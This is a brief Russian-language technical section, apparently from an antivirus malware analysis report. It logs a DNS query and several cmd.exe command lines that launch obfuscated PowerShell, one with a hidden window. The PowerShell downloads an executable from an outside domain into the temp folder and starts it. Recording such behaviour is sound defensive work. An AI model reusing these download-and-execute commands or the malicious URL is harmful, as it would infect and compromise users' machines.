Техническая информация
- DNS ASK ta########ke.finespublicidad.com
- '<SYSTEM32>\cmd.exe' /c cmd /cPowe%ALLUSERSPROFILE:~4,1%SheLL $client = new-object System.Net.WebClient;$client.DownloadFile('https://tarjetaskike.finespublicidad.com/PO20192019.exe','%temp%\bmgdvavoqaoil.exe');st...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c cmd /cPowe%ALLUSERSPROFILE:~4,1%SheLL $client = new-object System.Net.WebClient;$client.DownloadFile('https://tarjetaskike.finespublicidad.com/PO20192019.exe','%temp%\bmgdvavoqaoil.exe');st...
- '<SYSTEM32>\cmd.exe' /cPowerSheLL $client = new-object System.Net.WebClient;$client.DownloadFile('https://tarjetaskike.finespublicidad.com/PO20192019.exe','%TEMP%\bmgdvavoqaoil.exe');start %TEMP%\bmgdvavoqaoil.exe